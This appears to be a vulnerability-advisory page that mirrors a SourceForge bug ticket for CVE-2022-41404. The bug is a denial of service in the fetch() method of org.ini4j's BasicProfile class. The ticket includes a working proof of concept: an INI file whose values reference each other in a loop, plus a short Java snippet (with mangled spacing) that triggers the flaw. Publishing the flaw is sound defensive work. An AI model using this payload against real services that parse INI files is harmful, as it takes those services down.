Headline

CVE-2022-41404: [ini4j] / Bugs / #56 The package org.ini4j before 0.5.4 are vulnerable to get value via the fetch() method in BasicProfile class, which may lead to DoS attacks.

An issue in the fetch() method in the BasicProfile class of org.ini4j before v0.5.4 allows attackers to cause a Denial of Service (DoS) via unspecified vectors.

2 years ago

CVE

Open in Source

#dos #java

Home
Browse
[ini4j]
Bugs
Summary
Files
Reviews
Support
Wiki
Tickets ▾
- Feature Requests
- Bugs
- Patches
Discussion
Donate
Code
Cvs

Menu ▾ ▴

#56 The package org.ini4j before 0.5.4 are vulnerable to get value via the fetch() method in BasicProfile class, which may lead to DoS attacks.

Status: open

Priority: 9

Updated: 2022-09-20

Created: 2022-09-20

Private: No

Test logic usable to reproduce the behaviour
payload:
----payload.ini

[dopey] weight=${bashful/weight} height=${doc/height}

[bashful] weight=${dopey/weight} height=${dopey/height}

[doc] weight=49.5 height=87.7

----java poc

Iniini=newIni(); ini.load(newFileReader(newFile(“/Users/bingdian/IdeaProjects/soot/src/main/java/test.ini”)) ); ini.get(“dopey”).fetch(“weight”);

1 Attachments

Discussion

An issue in the fetch() method in the BasicProfile class of org.ini4j before v0.5.4 allows attackers to cause a Denial of Service (DoS) via unspecified vectors.

2 years ago

ghsa

Open in Source

#dos #git